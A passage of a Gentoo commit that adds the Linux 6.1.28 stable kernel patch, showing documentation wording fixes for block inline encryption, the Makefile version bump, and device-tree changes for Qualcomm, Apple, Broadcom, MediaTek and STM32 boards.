Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1027_linux-6.1.28.patch | 34891 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 34895 insertions(+)

diff --git a/0000_README b/0000_README
index 1f28562c..c442268b 100644
--- a/0000_README
+++ b/0000_README
@@ -151,6 +151,10 @@ Patch:  1026_linux-6.1.27.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.27
 
+Patch:  1027_linux-6.1.28.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.28
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1027_linux-6.1.28.patch b/1027_linux-6.1.28.patch
new file mode 100644
index 00000000..ad9f421d
--- /dev/null
+++ b/1027_linux-6.1.28.patch
@@ -0,0 +1,34891 @@
+diff --git a/Documentation/block/inline-encryption.rst b/Documentation/block/inline-encryption.rst
+index 4d151fbe20583..f9bf18ea65093 100644
+--- a/Documentation/block/inline-encryption.rst
++++ b/Documentation/block/inline-encryption.rst
+@@ -142,7 +142,7 @@ Therefore, we also introduce *blk-crypto-fallback*, which is an implementation
+ of inline encryption using the kernel crypto API.  blk-crypto-fallback is built
+ into the block layer, so it works on any block device without any special setup.
+ Essentially, when a bio with an encryption context is submitted to a
+-request_queue that doesn't support that encryption context, the block layer will
++block_device that doesn't support that encryption context, the block layer will
+ handle en/decryption of the bio using blk-crypto-fallback.
+ 
+ For encryption, the data cannot be encrypted in-place, as callers usually rely
+@@ -187,7 +187,7 @@ API presented to users of the block layer
+ 
+ ``blk_crypto_config_supported()`` allows users to check ahead of time whether
+ inline encryption with particular crypto settings will work on a particular
+-request_queue -- either via hardware or via blk-crypto-fallback.  This function
++block_device -- either via hardware or via blk-crypto-fallback.  This function
+ takes in a ``struct blk_crypto_config`` which is like blk_crypto_key, but omits
+ the actual bytes of the key and instead just contains the algorithm, data unit
+ size, etc.  This function can be useful if blk-crypto-fallback is disabled.
+@@ -195,7 +195,7 @@ size, etc.  This function can be useful if blk-crypto-fallback is disabled.
+ ``blk_crypto_init_key()`` allows users to initialize a blk_crypto_key.
+ 
+ Users must call ``blk_crypto_start_using_key()`` before actually starting to use
+-a blk_crypto_key on a request_queue (even if ``blk_crypto_config_supported()``
++a blk_crypto_key on a block_device (even if ``blk_crypto_config_supported()``
+ was called earlier).  This is needed to initialize blk-crypto-fallback if it
+ will be needed.  This must not be called from the data path, as this may have to
+ allocate resources, which may deadlock in that case.
+@@ -207,7 +207,7 @@ for en/decryption.  Users don't need to worry about freeing the bio_crypt_ctx
+ later, as that happens automatically when the bio is freed or reset.
+ 
+ Finally, when done using inline encryption with a blk_crypto_key on a
+-request_queue, users must call ``blk_crypto_evict_key()``.  This ensures that
++block_device, users must call ``blk_crypto_evict_key()``.  This ensures that
+ the key is evicted from all keyslots it may be programmed into and unlinked from
+ any kernel data structures it may be linked into.
+ 
+@@ -221,9 +221,9 @@ as follows:
+ 5. ``blk_crypto_evict_key()`` (after all I/O has completed)
+ 6. Zeroize the blk_crypto_key (this has no dedicated function)
+ 
+-If a blk_crypto_key is being used on multiple request_queues, then
++If a blk_crypto_key is being used on multiple block_devices, then
+ ``blk_crypto_config_supported()`` (if used), ``blk_crypto_start_using_key()``,
+-and ``blk_crypto_evict_key()`` must be called on each request_queue.
++and ``blk_crypto_evict_key()`` must be called on each block_device.
+ 
+ API presented to device drivers
+ ===============================
+diff --git a/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml b/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml
+index 1de11e7f33bbc..c8d803097d81d 100644
+--- a/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml
++++ b/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml
+@@ -27,6 +27,7 @@ properties:
+     const: 0
+ 
+   clocks:
++    minItems: 3
+     maxItems: 5
+ 
+   clock-names:
+diff --git a/Makefile b/Makefile
+index a5cfcd0a85a9e..2d221b879c48f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,9 +1,9 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 27
++SUBLEVEL = 28
+ EXTRAVERSION =
+-NAME = Hurr durr I'ma ninja sloth
++NAME = Curry Ramen
+ 
+ # *DOCUMENTATION*
+ # To see a list of typical targets execute "make help"
+diff --git a/arch/arm/boot/dts/omap3-gta04.dtsi b/arch/arm/boot/dts/omap3-gta04.dtsi
+index 28a6a9345be52..2dbee248a126f 100644
+--- a/arch/arm/boot/dts/omap3-gta04.dtsi
++++ b/arch/arm/boot/dts/omap3-gta04.dtsi
+@@ -612,6 +612,22 @@
+ 	clock-frequency = <100000>;
+ };
+ 
++&mcspi1 {
++	status = "disabled";
++};
++
++&mcspi2 {
++	status = "disabled";
++};
++
++&mcspi3 {
++	status = "disabled";
++};
++
++&mcspi4 {
++	status = "disabled";
++};
++
+ &usb_otg_hs {
+ 	interface-type = <0>;
+ 	usb-phy = <&usb2_phy>;
+diff --git a/arch/arm/boot/dts/qcom-apq8064.dtsi b/arch/arm/boot/dts/qcom-apq8064.dtsi
+index a39b940d58532..4b57e9f5bc648 100644
+--- a/arch/arm/boot/dts/qcom-apq8064.dtsi
++++ b/arch/arm/boot/dts/qcom-apq8064.dtsi
+@@ -1271,7 +1271,7 @@
+ 			gpu_opp_table: opp-table {
+ 				compatible = "operating-points-v2";
+ 
+-				opp-320000000 {
++				opp-450000000 {
+ 					opp-hz = /bits/ 64 <450000000>;
+ 				};
+ 
+diff --git a/arch/arm/boot/dts/qcom-ipq4019.dtsi b/arch/arm/boot/dts/qcom-ipq4019.dtsi
+index b23591110bd2b..02e13d8c222a0 100644
+--- a/arch/arm/boot/dts/qcom-ipq4019.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq4019.dtsi
+@@ -426,8 +426,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x40200000 0x40200000 0 0x00100000>,
+-				 <0x82000000 0 0x40300000 0x40300000 0 0x00d00000>;
++			ranges = <0x81000000 0x0 0x00000000 0x40200000 0x0 0x00100000>,
++				 <0x82000000 0x0 0x40300000 0x40300000 0x0 0x00d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm/boot/dts/qcom-ipq8064.dtsi b/arch/arm/boot/dts/qcom-ipq8064.dtsi
+index 90c08b51680aa..0ce58cff30165 100644
+--- a/arch/arm/boot/dts/qcom-ipq8064.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq8064.dtsi
+@@ -1085,8 +1085,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x0fe00000 0x0fe00000 0 0x00010000   /* downstream I/O */
+-				  0x82000000 0 0x08000000 0x08000000 0 0x07e00000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x0fe00000 0x0 0x00010000   /* I/O */
++				  0x82000000 0x0 0x08000000 0x08000000 0x0 0x07e00000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 35 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1136,8 +1136,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x31e00000 0x31e00000 0 0x00010000   /* downstream I/O */
+-				  0x82000000 0 0x2e000000 0x2e000000 0 0x03e00000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x31e00000 0x0 0x00010000   /* I/O */
++				  0x82000000 0x0 0x2e000000 0x2e000000 0x0 0x03e00000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 57 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1187,8 +1187,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x35e00000 0x35e00000 0 0x00010000   /* downstream I/O */
+-				  0x82000000 0 0x32000000 0x32000000 0 0x03e00000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x35e00000 0x0 0x00010000   /* I/O */
++				  0x82000000 0x0 0x32000000 0x32000000 0x0 0x03e00000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 71 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm/boot/dts/qcom-sdx55.dtsi b/arch/arm/boot/dts/qcom-sdx55.dtsi
+index 29fdf29fdb8c8..a4bf1d5ee2068 100644
+--- a/arch/arm/boot/dts/qcom-sdx55.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx55.dtsi
+@@ -303,6 +303,45 @@
+ 			status = "disabled";
+ 		};
+ 
++		pcie_ep: pcie-ep@1c00000 {
++			compatible = "qcom,sdx55-pcie-ep";
++			reg = <0x01c00000 0x3000>,
++			      <0x40000000 0xf1d>,
++			      <0x40000f20 0xc8>,
++			      <0x40001000 0x1000>,
++			      <0x40200000 0x100000>,
++			      <0x01c03000 0x3000>;
++			reg-names = "parf", "dbi", "elbi", "atu", "addr_space",
++				    "mmio";
++
++			qcom,perst-regs = <&tcsr 0xb258 0xb270>;
++
++			clocks = <&gcc GCC_PCIE_AUX_CLK>,
++				 <&gcc GCC_PCIE_CFG_AHB_CLK>,
++				 <&gcc GCC_PCIE_MSTR_AXI_CLK>,
++				 <&gcc GCC_PCIE_SLV_AXI_CLK>,
++				 <&gcc GCC_PCIE_SLV_Q2A_AXI_CLK>,
++				 <&gcc GCC_PCIE_SLEEP_CLK>,
++				 <&gcc GCC_PCIE_0_CLKREF_CLK>;
++			clock-names = "aux", "cfg", "bus_master", "bus_slave",
++				      "slave_q2a", "sleep", "ref";
++
++			interrupts = <GIC_SPI 140 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 145 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "global", "doorbell";
++			reset-gpios = <&tlmm 57 GPIO_ACTIVE_LOW>;
++			wake-gpios = <&tlmm 53 GPIO_ACTIVE_LOW>;
++			resets = <&gcc GCC_PCIE_BCR>;
++			reset-names = "core";
++			power-domains = <&gcc PCIE_GDSC>;
++			phys = <&pcie0_lane>;
++			phy-names = "pciephy";
++			max-link-speed = <3>;
++			num-lanes = <2>;
++
++			status = "disabled";
++		};
++
+ 		pcie0_phy: phy@1c07000 {
+ 			compatible = "qcom,sdx55-qmp-pcie-phy";
+ 			reg = <0x01c07000 0x1c4>;
+@@ -400,45 +439,6 @@
+ 			status = "disabled";
+ 		};
+ 
+-		pcie_ep: pcie-ep@40000000 {
+-			compatible = "qcom,sdx55-pcie-ep";
+-			reg = <0x01c00000 0x3000>,
+-			      <0x40000000 0xf1d>,
+-			      <0x40000f20 0xc8>,
+-			      <0x40001000 0x1000>,
+-			      <0x40200000 0x100000>,
+-			      <0x01c03000 0x3000>;
+-			reg-names = "parf", "dbi", "elbi", "atu", "addr_space",
+-				    "mmio";
+-
+-			qcom,perst-regs = <&tcsr 0xb258 0xb270>;
+-
+-			clocks = <&gcc GCC_PCIE_AUX_CLK>,
+-				 <&gcc GCC_PCIE_CFG_AHB_CLK>,
+-				 <&gcc GCC_PCIE_MSTR_AXI_CLK>,
+-				 <&gcc GCC_PCIE_SLV_AXI_CLK>,
+-				 <&gcc GCC_PCIE_SLV_Q2A_AXI_CLK>,
+-				 <&gcc GCC_PCIE_SLEEP_CLK>,
+-				 <&gcc GCC_PCIE_0_CLKREF_CLK>;
+-			clock-names = "aux", "cfg", "bus_master", "bus_slave",
+-				      "slave_q2a", "sleep", "ref";
+-
+-			interrupts = <GIC_SPI 140 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 145 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "global", "doorbell";
+-			reset-gpios = <&tlmm 57 GPIO_ACTIVE_LOW>;
+-			wake-gpios = <&tlmm 53 GPIO_ACTIVE_LOW>;
+-			resets = <&gcc GCC_PCIE_BCR>;
+-			reset-names = "core";
+-			power-domains = <&gcc PCIE_GDSC>;
+-			phys = <&pcie0_lane>;
+-			phy-names = "pciephy";
+-			max-link-speed = <3>;
+-			num-lanes = <2>;
+-
+-			status = "disabled";
+-		};
+-
+ 		remoteproc_mpss: remoteproc@4080000 {
+ 			compatible = "qcom,sdx55-mpss-pas";
+ 			reg = <0x04080000 0x4040>;
+diff --git a/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi b/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi
+index a9d2bec990141..e15a3b2a9b399 100644
+--- a/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi
++++ b/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi
+@@ -1880,6 +1880,21 @@
+ 		};
+ 	};
+ 
++	spi1_pins_b: spi1-1 {
++		pins1 {
++			pinmux = <STM32_PINMUX('A', 5, AF5)>, /* SPI1_SCK */
++				 <STM32_PINMUX('B', 5, AF5)>; /* SPI1_MOSI */
++			bias-disable;
++			drive-push-pull;
++			slew-rate = <1>;
++		};
++
++		pins2 {
++			pinmux = <STM32_PINMUX('A', 6, AF5)>; /* SPI1_MISO */
++			bias-disable;
++		};
++	};
++
+ 	spi2_pins_a: spi2-0 {
+ 		pins1 {
+ 			pinmux = <STM32_PINMUX('B', 10, AF5)>, /* SPI2_SCK */
+@@ -2448,19 +2463,4 @@
+ 			bias-disable;
+ 		};
+ 	};
+-
+-	spi1_pins_b: spi1-1 {
+-		pins1 {
+-			pinmux = <STM32_PINMUX('A', 5, AF5)>, /* SPI1_SCK */
+-				 <STM32_PINMUX('B', 5, AF5)>; /* SPI1_MOSI */
+-			bias-disable;
+-			drive-push-pull;
+-			slew-rate = <1>;
+-		};
+-
+-		pins2 {
+-			pinmux = <STM32_PINMUX('A', 6, AF5)>; /* SPI1_MISO */
+-			bias-disable;
+-		};
+-	};
+ };
+diff --git a/arch/arm64/boot/dts/apple/t8103-j274.dts b/arch/arm64/boot/dts/apple/t8103-j274.dts
+index c1f3ba9c39f6a..997ef90614c11 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j274.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j274.dts
+@@ -33,10 +33,12 @@
+ 
+ &port01 {
+ 	bus-range = <2 2>;
++	status = "okay";
+ };
+ 
+ &port02 {
+ 	bus-range = <3 3>;
++	status = "okay";
+ 	ethernet0: ethernet@0,0 {
+ 		reg = <0x30000 0x0 0x0 0x0 0x0>;
+ 		/* To be filled by the loader */
+@@ -44,6 +46,14 @@
+ 	};
+ };
+ 
++&pcie0_dart_1 {
++	status = "okay";
++};
++
++&pcie0_dart_2 {
++	status = "okay";
++};
++
+ &i2c2 {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/apple/t8103-j293.dts b/arch/arm64/boot/dts/apple/t8103-j293.dts
+index ecb10d237a053..3fd444ac8ae4e 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j293.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j293.dts
+@@ -21,21 +21,6 @@
+ 	brcm,board-type = "apple,honshu";
+ };
+ 
+-/*
+- * Remove unused PCIe ports and disable the associated DARTs.
+- */
+-
+-&pcie0_dart_1 {
+-	status = "disabled";
+-};
+-
+-&pcie0_dart_2 {
+-	status = "disabled";
+-};
+-
+-/delete-node/ &port01;
+-/delete-node/ &port02;
+-
+ &i2c2 {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/apple/t8103-j313.dts b/arch/arm64/boot/dts/apple/t8103-j313.dts
+index df741737b8e6f..9399c42de8a43 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j313.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j313.dts
+@@ -20,18 +20,3 @@
+ &wifi0 {
+ 	brcm,board-type = "apple,shikoku";
+ };
+-
+-/*
+- * Remove unused PCIe ports and disable the associated DARTs.
+- */
+-
+-&pcie0_dart_1 {
+-	status = "disabled";
+-};
+-
+-&pcie0_dart_2 {
+-	status = "disabled";
+-};
+-
+-/delete-node/ &port01;
+-/delete-node/ &port02;
+diff --git a/arch/arm64/boot/dts/apple/t8103-j456.dts b/arch/arm64/boot/dts/apple/t8103-j456.dts
+index 8c6bf95925107..d80223fa42292 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j456.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j456.dts
+@@ -51,13 +51,23 @@
+ 
+ &port01 {
+ 	bus-range = <2 2>;
++	status = "okay";
+ };
+ 
+ &port02 {
+ 	bus-range = <3 3>;
++	status = "okay";
+ 	ethernet0: ethernet@0,0 {
+ 		reg = <0x30000 0x0 0x0 0x0 0x0>;
+ 		/* To be filled by the loader */
+ 		local-mac-address = [00 10 18 00 00 00];
+ 	};
+ };
++
++&pcie0_dart_1 {
++	status = "okay";
++};
++
++&pcie0_dart_2 {
++	status = "okay";
++};
+diff --git a/arch/arm64/boot/dts/apple/t8103-j457.dts b/arch/arm64/boot/dts/apple/t8103-j457.dts
+index fe7c0aaf7d62a..e24ccb49e33cc 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j457.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j457.dts
+@@ -33,6 +33,7 @@
+ 
+ &port02 {
+ 	bus-range = <3 3>;
++	status = "okay";
+ 	ethernet0: ethernet@0,0 {
+ 		reg = <0x30000 0x0 0x0 0x0 0x0>;
+ 		/* To be filled by the loader */
+@@ -40,12 +41,6 @@
+ 	};
+ };
+ 
+-/*
+- * Remove unused PCIe port and disable the associated DART.
+- */
+-
+-&pcie0_dart_1 {
+-	status = "disabled";
++&pcie0_dart_2 {
++	status = "okay";
+ };
+-
+-/delete-node/ &port01;
+diff --git a/arch/arm64/boot/dts/apple/t8103.dtsi b/arch/arm64/boot/dts/apple/t8103.dtsi
+index a4d195e9eb8c8..84fd1b1b48f6f 100644
+--- a/arch/arm64/boot/dts/apple/t8103.dtsi
++++ b/arch/arm64/boot/dts/apple/t8103.dtsi
+@@ -428,6 +428,7 @@
+ 			interrupt-parent = <&aic>;
+ 			interrupts = <AIC_IRQ 699 IRQ_TYPE_LEVEL_HIGH>;
+ 			power-domains = <&ps_apcie_gp>;
++			status = "disabled";
+ 		};
+ 
+ 		pcie0_dart_2: iommu@683008000 {
+@@ -437,6 +438,7 @@
+ 			interrupt-parent = <&aic>;
+ 			interrupts = <AIC_IRQ 702 IRQ_TYPE_LEVEL_HIGH>;
+ 			power-domains = <&ps_apcie_gp>;
++			status = "disabled";
+ 		};
+ 
+ 		pcie0: pcie@690000000 {
+@@ -511,6 +513,7 @@
+ 						<0 0 0 2 &port01 0 0 0 1>,
+ 						<0 0 0 3 &port01 0 0 0 2>,
+ 						<0 0 0 4 &port01 0 0 0 3>;
++				status = "disabled";
+ 			};
+ 
+ 			port02: pci@2,0 {
+@@ -530,6 +533,7 @@
+ 						<0 0 0 2 &port02 0 0 0 1>,
+ 						<0 0 0 3 &port02 0 0 0 2>,
+ 						<0 0 0 4 &port02 0 0 0 3>;
++				status = "disabled";
+ 			};
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts
+index 839ca33178b01..d94a53d68320b 100644
+--- a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts
++++ b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts
+@@ -120,7 +120,7 @@
+ };
+ 
+ &leds {
+-	led-power@11 {
++	led@11 {
+ 		reg = <0x11>;
+ 		function = LED_FUNCTION_POWER;
+ 		color = <LED_COLOR_ID_WHITE>;
+@@ -130,7 +130,7 @@
+ 		pinctrl-0 = <&pins_led_17_a>;
+ 	};
+ 
+-	led-wan-red@12 {
++	led@12 {
+ 		reg = <0x12>;
+ 		function = LED_FUNCTION_WAN;
+ 		color = <LED_COLOR_ID_RED>;
+@@ -139,7 +139,7 @@
+ 		pinctrl-0 = <&pins_led_18_a>;
+ 	};
+ 
+-	led-wps@14 {
++	led@14 {
+ 		reg = <0x14>;
+ 		function = LED_FUNCTION_WPS;
+ 		color = <LED_COLOR_ID_WHITE>;
+@@ -148,7 +148,7 @@
+ 		pinctrl-0 = <&pins_led_20_a>;
+ 	};
+ 
+-	led-wan-white@15 {
++	led@15 {
+ 		reg = <0x15>;
+ 		function = LED_FUNCTION_WAN;
+ 		color = <LED_COLOR_ID_WHITE>;
+@@ -157,7 +157,7 @@
+ 		pinctrl-0 = <&pins_led_21_a>;
+ 	};
+ 
+-	led-lan@19 {
++	led@19 {
+ 		reg = <0x19>;
+ 		function = LED_FUNCTION_LAN;
+ 		color = <LED_COLOR_ID_WHITE>;
+diff --git a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
+index dac9d3b4e91df..df71348542064 100644
+--- a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
++++ b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
+@@ -253,7 +253,7 @@
+ 			};
+ 		};
+ 
+-		procmon: syscon@280000 {
++		procmon: bus@280000 {
+ 			compatible = "simple-bus";
+ 			reg = <0x280000 0x1000>;
+ 			ranges;
+@@ -532,7 +532,7 @@
+ 			reg = <0x1800 0x600>, <0x2000 0x10>;
+ 			reg-names = "nand", "nand-int-base";
+ 			interrupts = <GIC_SPI 37 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "nand";
++			interrupt-names = "nand_ctlrdy";
+ 			status = "okay";
+ 
+ 			nandcs: nand@0 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+index 4b314435f8fd6..50367da93cd79 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+@@ -935,7 +935,7 @@
+ 				regulator-compatible = "vbuck1";
+ 				regulator-name = "Vgpu";
+ 				regulator-min-microvolt = <606250>;
+-				regulator-max-microvolt = <1193750>;
++				regulator-max-microvolt = <800000>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-allowed-modes = <0 1 2>;
+ 			};
+diff --git a/arch/arm64/boot/dts/qcom/apq8096-db820c.dts b/arch/arm64/boot/dts/qcom/apq8096-db820c.dts
+index 5cdc7ac1a9c06..c7de5e3b071ef 100644
+--- a/arch/arm64/boot/dts/qcom/apq8096-db820c.dts
++++ b/arch/arm64/boot/dts/qcom/apq8096-db820c.dts
+@@ -742,8 +742,7 @@
+ &pmi8994_spmi_regulators {
+ 	vdd_s2-supply = <&vph_pwr>;
+ 
+-	vdd_gfx: s2@1700 {
+-		reg = <0x1700 0x100>;
++	vdd_gfx: s2 {
+ 		regulator-name = "VDD_GFX";
+ 		regulator-min-microvolt = <980000>;
+ 		regulator-max-microvolt = <980000>;
+diff --git a/arch/arm64/boot/dts/qcom/ipq6018.dtsi b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+index a7c7ca980a71c..c3492a3831558 100644
+--- a/arch/arm64/boot/dts/qcom/ipq6018.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+@@ -436,10 +436,8 @@
+ 			phys = <&pcie_phy0>;
+ 			phy-names = "pciephy";
+ 
+-			ranges = <0x81000000 0 0x20200000 0 0x20200000
+-				  0 0x10000>, /* downstream I/O */
+-				 <0x82000000 0 0x20220000 0 0x20220000
+-				  0 0xfde0000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x0 0x20200000 0x0 0x10000>,
++				 <0x82000000 0x0 0x20220000 0x0 0x20220000 0x0 0xfde0000>;
+ 
+ 			interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074.dtsi b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+index 05b97b05d4462..3f7cf3fdd319f 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+@@ -750,10 +750,8 @@
+ 			phys = <&pcie_phy1>;
+ 			phy-names = "pciephy";
+ 
+-			ranges = <0x81000000 0 0x10200000 0x10200000
+-				  0 0x10000>,   /* downstream I/O */
+-				 <0x82000000 0 0x10220000 0x10220000
+-				  0 0xfde0000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x10200000 0x0 0x10000>,   /* I/O */
++				 <0x82000000 0x0 0x10220000 0x10220000 0x0 0xfde0000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 85 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -814,10 +812,8 @@
+ 			phys = <&pcie_phy0>;
+ 			phy-names = "pciephy";
+ 
+-			ranges = <0x81000000 0 0x20200000 0x20200000
+-				  0 0x10000>, /* downstream I/O */
+-				 <0x82000000 0 0x20220000 0x20220000
+-				  0 0xfde0000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x20200000 0x0 0x10000>,   /* I/O */
++				 <0x82000000 0x0 0x20220000 0x20220000 0x0 0xfde0000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+index 465b2828acbd4..13b8823ae063a 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+@@ -60,11 +60,6 @@
+ 			reg = <0x0 0x05000000 0x0 0x1a00000>;
+ 			no-map;
+ 		};
+-
+-		reserved@6c00000 {
+-			reg = <0x0 0x06c00000 0x0 0x400000>;
+-			no-map;
+-		};
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts b/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
+index 7e2c0dcc11ab1..4801d973f9d7c 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
++++ b/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
+@@ -1,7 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ /* Copyright (c) 2015, Huawei Inc. All rights reserved.
+  * Copyright (c) 2016, The Linux Foundation. All rights reserved.
+- * Copyright (c) 2021-2022, Petr Vorel <petr.vorel@gmail.com>
++ * Copyright (c) 2021-2023, Petr Vorel <petr.vorel@gmail.com>
+  */
+ 
+ /dts-v1/;
+@@ -30,13 +30,18 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
++		cont_splash_mem: memory@3401000 {
++			reg = <0 0x03401000 0 0x1000000>;
++			no-map;
++		};
++
+ 		tzapp_mem: tzapp@4800000 {
+ 			reg = <0 0x04800000 0 0x1900000>;
+ 			no-map;
+ 		};
+ 
+-		removed_region: reserved@6300000 {
+-			reg = <0 0x06300000 0 0xD00000>;
++		reserved@6300000 {
++			reg = <0 0x06300000 0 0x700000>;
+ 			no-map;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi b/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi
+index f9d8bd09e074a..c6145ee8b278e 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi
+@@ -542,8 +542,7 @@
+ };
+ 
+ &pmi8994_spmi_regulators {
+-	vdd_gfx: s2@1700 {
+-		reg = <0x1700 0x100>;
++	vdd_gfx: s2 {
+ 		regulator-min-microvolt = <980000>;
+ 		regulator-max-microvolt = <980000>;
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi b/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi
+index ff60b7004d260..2ecf455db8307 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi
+@@ -173,8 +173,7 @@
+ 	 * power domain.. which still isn't enough and forces us to bind
+ 	 * OXILI_CX and OXILI_GX together!
+ 	 */
+-	vdd_gfx: s2@1700 {
+-		reg = <0x1700 0x100>;
++	vdd_gfx: s2 {
+ 		regulator-name = "VDD_GFX";
+ 		regulator-min-microvolt = <980000>;
+ 		regulator-max-microvolt = <980000>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8994.dtsi b/arch/arm64/boot/dts/qcom/msm8994.dtsi
+index ded5b7ceeaf97..7ed59e698c14d 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994.dtsi
+@@ -227,6 +227,11 @@
+ 			reg = <0 0xc9400000 0 0x3f00000>;
+ 			no-map;
+ 		};
++
++		reserved@6c00000 {
++			reg = <0 0x06c00000 0 0x400000>;
++			no-map;
++		};
+ 	};
+ 
